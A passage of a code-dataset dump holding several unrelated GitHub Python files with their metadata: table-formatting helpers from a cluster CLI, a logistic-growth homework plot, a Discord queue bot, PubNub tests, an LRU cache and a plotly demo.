val_row.append(\"--NA--\")\n self.logger.debug(f'Element => {ele}')\n rows.append(val_row)\n val_row = []\n colored_fields.append(field_key)\n fields = colored_fields\n self.logger.debug(f'Rows before Swapping => {rows}')\n final_rows = []\n for array in range(len(rows[0])) :\n tmp = []\n for element in rows:\n tmp.append(element[array])\n final_rows.append(tmp)\n rows = final_rows\n # Adding Serial Numbers to the dataset\n fields.insert(0, '#')\n num = 1\n for outer in rows:\n outer.insert(0, num)\n num = num + 1\n # Adding Serial Numbers to the dataset\n return fields, rows\n\n\n def filter_data(self, table=None, data=None):\n \"\"\"\n This method will generate the data as for\n row format\n \"\"\"\n self.logger.debug(f'Table => {table}')\n self.logger.debug(f'Data => {data}')\n fields, rows, colored_fields = [], [], []\n fields = filter_columns(table)\n self.logger.debug(f'Fields => {fields}')\n for field_key in fields:\n val_row = []\n for ele in data:\n if field_key in list((data[ele].keys())):\n if isinstance(data[ele][field_key], list):\n new_list = []\n for internal in data[ele][field_key]:\n for internal_val in internal:\n self.logger.debug(f'Key => {internal_val}')\n self.logger.debug(f'Value => {internal[internal_val]}')\n in_key = internal_val\n in_val = internal[internal_val]\n new_list.append(f'{in_key} = {in_val} ')\n new_list = '\\n'.join(new_list)\n val_row.append(new_list)\n new_list = []\n elif field_key == 'tpm_uuid':\n if data[ele][field_key]:\n val_row.append(True)\n else:\n val_row.append(False)\n else:\n val_row.append(data[ele][field_key])\n else:\n val_row.append(\"--NA--\")\n rows.append(val_row)\n self.logger.debug(f'Each Row => {val_row}')\n val_row = []\n colored_fields.append(field_key)\n fields = colored_fields\n final_rows = []\n for array in range(len(rows[0])) :\n tmp = []\n for element in rows:\n tmp.append(element[array])\n final_rows.append(tmp)\n rows = final_rows\n # Adding Serial Numbers to the dataset\n fields.insert(0, '#')\n num = 1\n for outer in rows:\n outer.insert(0, num)\n num = num + 1\n # Adding Serial Numbers to the dataset\n return fields, rows\n\n\n def base64_encode(self, content=None):\n \"\"\"\n This method will encode a base 64 string.\n \"\"\"\n try:\n if content is not None:\n content = base64.b64encode(content).decode(\"utf-8\")\n except binascii.Error:\n self.logger.debug(f'Base64 Encode Error => {content}')\n return content\n\n\n def base64_decode(self, content=None):\n \"\"\"\n This method will decode the base 64 string.\n \"\"\"\n try:\n if content is not None:\n content = content.replace(\"\\r\", \"\\\\r\")\n content = base64.b64decode(content, validate=True).decode(\"utf-8\")\n except binascii.Error:\n self.logger.debug(f'Base64 Decode Error => {content}')\n except UnicodeDecodeError:\n self.logger.debug(f'Base64 Unicode Decode Error => {content}')\n return content\n\n\n def update_dict(self, data=None):\n \"\"\"\n Deep Update the Dict\n \"\"\"\n for key, value in data.items():\n if isinstance(value, str):\n value = None if value == 'None' else value\n if value is not None:\n data[key] = self.base64_decode(value)\n return self.update_dict(data)\n else:\n return self.update_dict(data)\n return data\n\n\n def callback(self, value=None):\n \"\"\"\n This method is a call back method for the nested lookup.\n \"\"\"\n if isinstance(value, str):\n if value.lower() == 'none':\n value = None\n elif value.lower() == 'true':\n value = True\n elif value.lower() == 'false':\n value = False\n elif value.lower() == 'null':\n value = None\n response = value\n if value not in [None, True, False] and isinstance(value, str):\n response = self.base64_decode(value)\n return response\n\n\n def nested_dict(self, dictionary=None, limit=False):\n \"\"\"\n This method will check the nested dictionary.\n \"\"\"\n for key, value in dictionary.items():\n if isinstance(value, str):\n if key in EDITOR_KEYS:\n doc = nested_alter({key : value}, key, self.callback)\n dictionary[key] = self.less_content(doc[key], limit)\n else:\n dictionary[key] = value\n elif isinstance(value, dict):\n return self.nested_dict(dictionary, limit)\n elif isinstance(value, list):\n return self.nested_list(dictionary, key, value, limit)\n return dictionary\n\n\n def nested_list(self, dictionary=None, key=None, value=None, limit=False):\n \"\"\"\n This method will check the list for a dictionary.\n \"\"\"\n response = []\n if value:\n for occurrence in value:\n if isinstance(occurrence, str):\n if key in EDITOR_KEYS:\n doc = nested_alter({key : occurrence}, key, self.callback)\n response.append(self.less_content(doc[key], limit))\n else:\n response.append(occurrence)\n elif isinstance(occurrence, dict):\n response.append(self.nested_dict(occurrence, limit))\n dictionary[key] = response\n return dictionary\n\n\n def less_content(self, content=None, limit=False):\n \"\"\"\n This method will reduce the length of the content.\n \"\"\"\n if limit:\n if content not in [None, True, False] and isinstance(content, str):\n if len(content) > 60:\n content = content[:60]+' ...'\n return content\n\n\n def prepare_json(self, json_data=None, limit=False):\n \"\"\"\n This method will decode the base 64 string.\n \"\"\"\n self.logger.debug(f'Data Limit => {limit}')\n if isinstance(json_data, dict):\n for key, value in json_data.items():\n if isinstance(value, str):\n if key in EDITOR_KEYS:\n doc = nested_alter({key : value}, key, self.callback)\n json_data[key] = self.less_content(doc[key], limit)\n else:\n json_data[key] = value\n elif isinstance(value, dict):\n json_data[key] = self.nested_dict(value, limit)\n elif isinstance(value, list):\n final_list = []\n if value:\n for occurrence in value:\n if isinstance(occurrence, str):\n doc = nested_alter({key : occurrence}, key, self.callback)\n final_list.append(self.less_content(doc[key], limit))\n elif isinstance(occurrence, dict):\n final_list.append(self.nested_dict(occurrence, limit))\n json_data[key] = final_list\n return json_data\n\n\n def get_secrets(self, table=None, data=None):\n \"\"\"\n This method will filter data for Secrets\n \"\"\"\n self.logger.debug(f'Table => {table} and Data => {data}')\n rows, colored_fields = [], []\n fields = filter_columns(table)\n self.logger.debug(f'Fields => {fields}')\n for key in data:\n new_row = []\n for value in data[key]:\n self.logger.debug(f'Key => {key} and Value => {value}')\n new_row.append(key)\n new_row.append(value['name'])\n new_row.append(value['path'])\n content = self.base64_decode(value['content'])\n if content is not None:\n new_row.append(content[:60]+'...')\n else:\n new_row.append(content)\n rows.append(new_row)\n new_row = []\n for newfield in fields:\n colored_fields.append(newfield)\n fields = colored_fields\n # Adding Serial Numbers to the dataset\n fields.insert(0, '#')\n num = 1\n for outer in rows:\n outer.insert(0, num)\n num = num + 1\n # Adding Serial Numbers to the dataset\n return fields, rows\n\n\n def filter_secret_col(self, table=None, data=None):\n \"\"\"\n This method will generate the data as for\n row format\n \"\"\"\n self.logger.debug(f'Table => {table} and Data => {data}')\n rows, colored_fields = [], []\n fields = sortby(table)\n self.logger.debug(f'Fields => {fields}')\n for key in data:\n new_row = []\n for value in data[key]:\n self.logger.debug(f'Key => {key} and Value => {value}')\n new_row.append(key)\n new_row.append(value['name'])\n new_row.append(value['path'])\n content = self.base64_decode(value['content'])\n if content is not None:\n new_row.append(content[:60]+'...')\n else:\n new_row.append(content)\n # new_row.append(content)\n rows.append(new_row)\n new_row = []\n for newfield in fields:\n colored_fields.append(newfield)\n fields = colored_fields\n # Adding Serial Numbers to the dataset\n fields.insert(0, '#')\n num = 1\n for outer in rows:\n outer.insert(0, num)\n num = num + 1\n # Adding Serial Numbers to the dataset\n new_fields, new_row = [], []\n for row in rows:\n new_fields = new_fields + fields\n new_row = new_row + row\n new_fields.append(\"\")\n new_row.append(\"\")\n return new_fields, new_row\n\n\n def filter_data_col(self, table=None, data=None):\n \"\"\"\n This method will generate the data as for row format\n \"\"\"\n self.logger.debug(f'Table => {table} and Data => {data}')\n defined_keys = sortby(table)\n self.logger.debug(f'Fields => {defined_keys}')\n data = self.merge_source(table, data)\n for new_key in list(data.keys()):\n if new_key not in defined_keys:\n defined_keys.append(new_key)\n index_map = {v: i for i, v in enumerate(defined_keys)}\n data = sorted(data.items(), key=lambda pair: index_map[pair[0]])\n self.logger.debug(f'Sorted Data => {data}')\n fields, rows = [], []\n for key in data:\n fields.append(key[0])\n if isinstance(key[1], list):\n new_list = []\n for internal in key[1]:\n for internal_val in internal:\n self.logger.debug(f'Key: {internal_val} Value: {internal[internal_val]}')\n if internal_val == \"interface\":\n new_list.append(f'{internal_val} = {internal[internal_val]}')\n else:\n new_list.append(f' {internal_val} = {internal[internal_val]}')\n new_list = '\\n'.join(new_list)\n rows.append(new_list)\n new_list = []\n elif isinstance(key[1], dict):\n new_list = []\n num = 1\n for internal in key[1]:\n self.logger.debug(f'Key => {internal} and Value => {key[1][internal]}')\n in_key = internal\n in_val = key[1][internal]\n new_list.append(f'{in_key} = {in_val} ')\n num = num + 1\n new_list = '\\n'.join(new_list)\n rows.append(new_list)\n new_list = []\n else:\n rows.append(key[1])\n return fields, rows\n\n\n def merge_source(self, table=None, data=None):\n \"\"\"\n This method will merge *_source field to the real field with braces and remove the\n *_source keys from the output.\n \"\"\"\n response = deepcopy(data)\n for key, value in data.items():\n script = True if 'part' in key or 'post' in key or 'pre' in key else False\n if '_source' in key:\n raw_name = key.replace('_source', '')\n if isinstance(data[raw_name], str):\n default_value = data[raw_name].rstrip()\n if len(default_value) == 0:\n default_value = ''\n else:\n default_value = data[raw_name]\n if value in data:\n if script is True and default_value != '':\n response[raw_name] = f'({data[value]}) {default_value}'\n else:\n response[raw_name] = f'{default_value} ({data[value]})'\n else:\n if str(value) == str(table):\n response[raw_name] = f'{default_value}'\n else:\n if script is True and default_value != '':\n response[raw_name] = f'({value}) {default_value}'\n else:\n response[raw_name] = f'{default_value} ({value})'\n del response[key]\n return response\n\n\n def filter_osimage_col(self, table=None, data=None):\n \"\"\"\n This method will generate the data as for row format\n \"\"\"\n self.logger.debug(f'Table => {table} and Data => {data}')\n defined_keys = sortby(table)\n self.logger.debug(f'Fields => {defined_keys}')\n for new_key in list(data.keys()):\n if new_key not in defined_keys:\n defined_keys.append(new_key)\n index_map = {v: i for i, v in enumerate(defined_keys)}\n data = sorted(data.items(), key=lambda pair: index_map[pair[0]])\n self.logger.debug(f'Sorted Data => {data}')\n osimage = [\"OS Image\\n\"]\n fields, rows = [\"Tags\\n\"], [\"Details\\n\"]\n for key in data:\n fields.append(key[0])\n osimage.append(key[1]['osimage'])\n if isinstance(key[1], list):\n new_list = []\n for internal in key[1]:\n for internal_val in internal:\n self.logger.debug(f'Key: {internal_val} Value: {internal[internal_val]}')\n if internal_val == \"interface\":\n new_list.append(f'{internal_val} = {internal[internal_val]}')\n else:\n new_list.append(f' {internal_val} = {internal[internal_val]}')\n new_list = '\\n'.join(new_list)\n rows.append(new_list)\n new_list = []\n elif isinstance(key[1], dict):\n new_list = []\n num = 1\n for internal in key[1]:\n self.logger.debug(f'Key => {internal} and Value => {key[1][internal]}')\n if internal != \"name\":\n in_key = internal\n in_val = key[1][internal]\n if len(key[1]) == num:\n new_list.append(f'{in_key} = {in_val} \\n')\n else:\n new_list.append(f'{in_key} = {in_val} ')\n num = num + 1\n new_list = '\\n'.join(new_list)\n rows.append(new_list)\n new_list = []\n else:\n rows.append(key[1])\n return fields, osimage, rows\n", "repo_name": "clustervision/luna2-cli", "sub_path": "luna/utils/helper.py", "file_name": "helper.py", "file_ext": "py", "file_size_in_byte": 40945, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "luna.utils.log.Log.get_logger", "line_number": 37, "usage_type": "call"}, {"api_name": "luna.utils.log.Log", "line_number": 37, "usage_type": "name"}, {"api_name": "luna.utils.constant.BOOL_KEYS", "line_number": 45, "usage_type": "name"}, {"api_name": "nested_lookup.nested_lookup", "line_number": 46, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 50, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 52, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 54, "usage_type": "call"}, {"api_name": "luna.utils.constant.EDITOR_KEYS", "line_number": 64, "usage_type": "name"}, {"api_name": "nested_lookup.nested_lookup", "line_number": 65, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 69, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 73, "usage_type": "call"}, {"api_name": "nested_lookup.nested_lookup", "line_number": 75, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 78, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 81, "usage_type": "call"}, {"api_name": "nested_lookup.nested_delete", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "nested_lookup.nested_update", "line_number": 89, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 91, "usage_type": "call"}, {"api_name": "nested_lookup.nested_update", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.chmod", "line_number": 107, "usage_type": "call"}, {"api_name": "time.time", "line_number": 108, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 108, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 108, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 110, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 120, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 121, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 124, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 125, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 135, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 139, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 146, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 155, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 157, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 168, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 172, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 181, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 188, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 190, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 199, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 203, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 209, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 219, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 221, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 230, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 234, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 240, "usage_type": "call"}, {"api_name": "luna.utils.presenter.Presenter", "line_number": 250, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 252, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 265, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 268, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 270, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 273, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 275, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 298, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 300, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 303, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 305, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 307, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 311, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 313, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 315, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 326, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 329, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 331, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 343, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 346, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 348, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 361, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 364, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 366, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 374, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 383, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 390, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 399, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 400, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 401, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 407, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 409, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 417, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 426, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 433, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 442, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 443, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 444, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 450, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 452, "usage_type": "call"}, {"api_name": "hostlist.expand_hostlist", "line_number": 463, "usage_type": "call"}, {"api_name": "hostlist.BadHostlist", "line_number": 465, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 505, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 541, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 542, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 543, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 548, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 557, "usage_type": "call"}, {"api_name": "luna.utils.rest.Rest", "line_number": 558, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 566, "usage_type": "call"}, {"api_name": "luna.utils.message.Message", "line_number": 568, "usage_type": "call"}, {"api_name": "luna.utils.constant.filter_columns", "line_number": 579, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 586, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 588, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 590, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 592, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 594, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 596, "usage_type": "call"}, {"api_name": "luna.utils.constant.filter_columns", "line_number": 632, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 687, "usage_type": "call"}, {"api_name": "binascii.Error", "line_number": 688, "usage_type": "attribute"}, {"api_name": "base64.b64decode", "line_number": 700, "usage_type": "call"}, {"api_name": "binascii.Error", "line_number": 701, "usage_type": "attribute"}, {"api_name": "luna.utils.constant.EDITOR_KEYS", "line_number": 748, "usage_type": "name"}, {"api_name": "nested_lookup.nested_alter", "line_number": 749, "usage_type": "call"}, {"api_name": "luna.utils.constant.EDITOR_KEYS", "line_number": 768, "usage_type": "name"}, {"api_name": "nested_lookup.nested_alter", "line_number": 769, "usage_type": "call"}, {"api_name": "luna.utils.constant.EDITOR_KEYS", "line_number": 798, "usage_type": "name"}, {"api_name": "nested_lookup.nested_alter", "line_number": 799, "usage_type": "call"}, {"api_name": "nested_lookup.nested_alter", "line_number": 810, "usage_type": "call"}, {"api_name": "luna.utils.constant.filter_columns", "line_number": 824, "usage_type": "call"}, {"api_name": "luna.utils.constant.sortby", "line_number": 860, "usage_type": "call"}, {"api_name": "luna.utils.constant.sortby", "line_number": 901, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 947, "usage_type": "call"}, {"api_name": "luna.utils.constant.sortby", "line_number": 980, "usage_type": "call"}]}
+{"seq_id": "6230116645", "text": "#written using python2.7 (renamed .py to .txt)\n\n\n#created 2 plots (1 semilog,1 linear)\n#I decreased step size and increased time to get a longer plot\n\nimport matplotlib.pyplot as plt\n\ndef integrate(r,k):\n\tt=0 \n\tdx=.001 #small perturbation\n\tx=0.001 #initial x\n\tdt=.01\n\twhile t<12:\n\t\tdxdt=r*x*(1-x/k)/(k*r) #function\n\t\tx+= dxdt*dt/k #incrimenting x values\n\t\tt+=dt*r #incrimenting time values\n\t\t#plt.plot(t,x,'--bo')\n\t\tplt.ylabel(\"X(t)\")\n\t\tplt.xlabel(\"Time\")\n\t\tplt.semilogy(t,x,'--bo')\n\t#print(t,x)\nintegrate(4,30) ##r affects rise rate, k leads to asymptote \nintegrate(2,2)\nintegrate(1,4) \nintegrate(15,1)\nintegrate(20,5)\nplt.show()\n\n\n", "repo_name": "bpc5604/chaos", "sub_path": "HW03/hw03.py", "file_name": "hw03.py", "file_ext": "py", "file_size_in_byte": 654, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.ylabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.semilogy", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]}
+{"seq_id": "38610606928", "text": "import time, datetime\nimport sched\n\nimport discord\nfrom discord.ext import commands, tasks\n\nimport config\nimport embeds\n\npop_message: discord.message\n\n# keeping track of who's in a pop\npopped_members = []\nwaiting_members = []\n\n# ending timestamp\nend_time = \"\"\n\n\n# since these buttons only apply inside this handler they can be here\nclass ReadyButton(discord.ui.View):\n def __init__(self, head_text):\n super().__init__(timeout=None)\n self.header = head_text\n\n @discord.ui.button(label=\"Ready!\", style=discord.ButtonStyle.primary)\n async def ready_button(self, interaction: discord.Interaction, button: discord.ui.Button):\n await interaction.response.defer()\n accept_player(interaction.user)\n await interaction.message.edit(content=self.header,\n embed=embeds.get_waiting_embed_unix(waiting_members=waiting_members,\n end_time=end_time))\n\n\n@tasks.loop(seconds=1, count=config.queue_timer)\nasync def queue_timer():\n if len(waiting_members) == 0:\n queue_timer.stop()\n\n\n@queue_timer.after_loop\nasync def after_timer():\n return\n\n\n# remove a player from the list of un-accepted players when they ready\ndef accept_player(player):\n global waiting_members\n\n if player in waiting_members:\n waiting_members.remove(player)\n\n\n# seeing who in a pop is readying\nasync def afk_check_pop(channel, popped_players, new_players):\n global popped_members\n global waiting_members\n global pop_message\n global end_time\n\n # set up queue timer\n remaining_time = config.queue_timer\n\n end_time = f''\n\n scheduler = sched.scheduler(time.time, time.sleep)\n\n # mem issues w/ refs requires you to make copy here\n popped_members = popped_players.copy()\n waiting_members = new_players.copy()\n\n print(popped_members)\n\n # create a header listing match members so you can see who's actually in the match\n header = \"Match Ready For: \\n\"\n\n for member in popped_players:\n id = member.id\n header += f'<@{id}> '\n\n # this gets updated each loop cycle\n temp = header + \"\\nWaiting On: \\n \"\n\n for member in waiting_members:\n id = member.id\n temp += f'<@{id}> '\n\n temp += \"\\nTime Remaining: \" + str(remaining_time)\n\n # add message and reaction\n # copy needed to fix mem issues with async\n pop_message_temp = await channel.send(content=header, view=ReadyButton(header),\n embed=embeds.get_waiting_embed_unix(waiting_members=waiting_members,\n end_time=end_time))\n pop_message = pop_message_temp\n\n # start queue countdown\n await queue_timer.start()\n\n # remove the expired pop message\n await pop_message_temp.delete()\n\n return\n\n\n# clear popped members from memory\ndef clear_pop():\n global popped_members\n\n popped_members = []\n", "repo_name": "Acoliver102/Tonguelash", "sub_path": "pop_handler.py", "file_name": "pop_handler.py", "file_ext": "py", "file_size_in_byte": 3033, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "discord.message", "line_number": 10, "usage_type": "attribute"}, {"api_name": "discord.ui", "line_number": 21, "usage_type": "attribute"}, {"api_name": "discord.Interaction", "line_number": 27, "usage_type": "attribute"}, {"api_name": "discord.ui", "line_number": 27, "usage_type": "attribute"}, {"api_name": "embeds.get_waiting_embed_unix", "line_number": 31, "usage_type": "call"}, {"api_name": "discord.ui.button", "line_number": 26, "usage_type": "call"}, {"api_name": "discord.ui", "line_number": 26, "usage_type": "attribute"}, {"api_name": "discord.ButtonStyle", "line_number": 26, "usage_type": "attribute"}, {"api_name": "discord.ext.tasks.loop", "line_number": 35, "usage_type": "call"}, {"api_name": "discord.ext.tasks", "line_number": 35, "usage_type": "name"}, {"api_name": "config.queue_timer", "line_number": 35, "usage_type": "attribute"}, {"api_name": "config.queue_timer", "line_number": 62, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 64, "usage_type": "call"}, {"api_name": "config.queue_timer", "line_number": 64, "usage_type": "attribute"}, {"api_name": "sched.scheduler", "line_number": 66, "usage_type": "call"}, {"api_name": "time.time", "line_number": 66, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 66, "usage_type": "attribute"}, {"api_name": "embeds.get_waiting_embed_unix", "line_number": 93, "usage_type": "call"}]}
+{"seq_id": "34180895202", "text": "import unittest\nimport threading\n\nfrom pubnub.pubnub import PubNub\nfrom tests.helper import pnconf\n\n\nclass TestPubNubSuccessHistoryDelete(unittest.TestCase): # pylint: disable=W0612\n def setUp(self):\n self.event = threading.Event()\n\n def callback(self, response, status):\n self.response = response\n self.status = status\n self.event.set()\n\n def assert_success(self):\n self.event.wait()\n if self.status.is_error():\n self.fail(str(self.status.error_data.exception))\n self.event.clear()\n self.response = None\n self.status = None\n\n def test_success(self):\n PubNub(pnconf).delete_messages() \\\n .channel(\"my-ch\") \\\n .start(123) \\\n .end(456) \\\n .pn_async(self.callback)\n\n self.assert_success()\n\n def test_super_call(self):\n PubNub(pnconf).delete_messages() \\\n .channel(\"my-ch- |.* $\") \\\n .start(123) \\\n .end(456) \\\n .pn_async(self.callback)\n\n self.assert_success()\n", "repo_name": "pubnub/python", "sub_path": "tests/integrational/native_threads/test_history_delete.py", "file_name": "test_history_delete.py", "file_ext": "py", "file_size_in_byte": 1063, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 155, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 8, "usage_type": "attribute"}, {"api_name": "threading.Event", "line_number": 10, "usage_type": "call"}, {"api_name": "pubnub.pubnub.PubNub", "line_number": 26, "usage_type": "call"}, {"api_name": "tests.helper.pnconf", "line_number": 26, "usage_type": "argument"}, {"api_name": "pubnub.pubnub.PubNub", "line_number": 35, "usage_type": "call"}, {"api_name": "tests.helper.pnconf", "line_number": 35, "usage_type": "argument"}]}
+{"seq_id": "21963434324", "text": "from collections import OrderedDict\nfrom copy import deepcopy\nfrom typing import Any\n\nfrom pims.config import get_settings\n\n\nclass LRUCache:\n def __init__(self, capacity: int):\n self.cache = OrderedDict()\n self.capacity = capacity\n\n def get(self, key: str) -> Any:\n if key not in self.cache:\n return None\n else:\n self.cache.move_to_end(key)\n return self.cache[key]\n\n def put(self, key: str, value: Any) -> None:\n self.cache[key] = value\n self.cache.move_to_end(key)\n if len(self.cache) > self.capacity:\n self.cache.popitem(last=False)\n\n\nclass ImageLRUCache(LRUCache):\n def get(self, key: str) -> Any:\n image = super().get(key)\n if image is None:\n return None\n cloned = deepcopy(image)\n self.cache[key] = cloned\n return cloned\n\n\nIMAGE_CACHE = ImageLRUCache(get_settings().memory_lru_cache_capacity)\n", "repo_name": "Cytomine-ULiege/pims", "sub_path": "pims/cache/memory.py", "file_name": "memory.py", "file_ext": "py", "file_size_in_byte": 949, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.OrderedDict", "line_number": 10, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 20, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 32, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 28, "usage_type": "name"}, {"api_name": "pims.config.get_settings", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "27574655967", "text": "import plotly.express as px\nimport time\n\ndef Parallel_Coordinates_Plot():\n start_time = time.time()\n\n df = px.data.iris()\n fig = px.parallel_coordinates(df, color=\"species_id\", labels={\"species_id\": \"Species\",\n \"sepal_width\": \"Sepal Width\", \"sepal_length\": \"Sepal Length\",\n \"petal_width\": \"Petal Width\", \"petal_length\": \"Petal Length\", },\n color_continuous_scale=px.colors.diverging.Tealrose,\n color_continuous_midpoint=2)\n fig.update_layout(\n title='Parallel Coodinates Plot')\n\n end_time = round(time.time() - start_time, 3)\n print(str(end_time) + ' seconds Graphing data for Parallel_Coordinates_Plot')\n\n fig.show()", "repo_name": "AllenChildress/Python_Plotly_Demo", "sub_path": "Parallel_Coordinates_Plot.py", "file_name": "Parallel_Coordinates_Plot.py", "file_ext": "py", "file_size_in_byte": 747, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 5, "usage_type": "call"}, {"api_name": "plotly.express.data.iris", "line_number": 7, "usage_type": "call"}, {"api_name": "plotly.express.data", 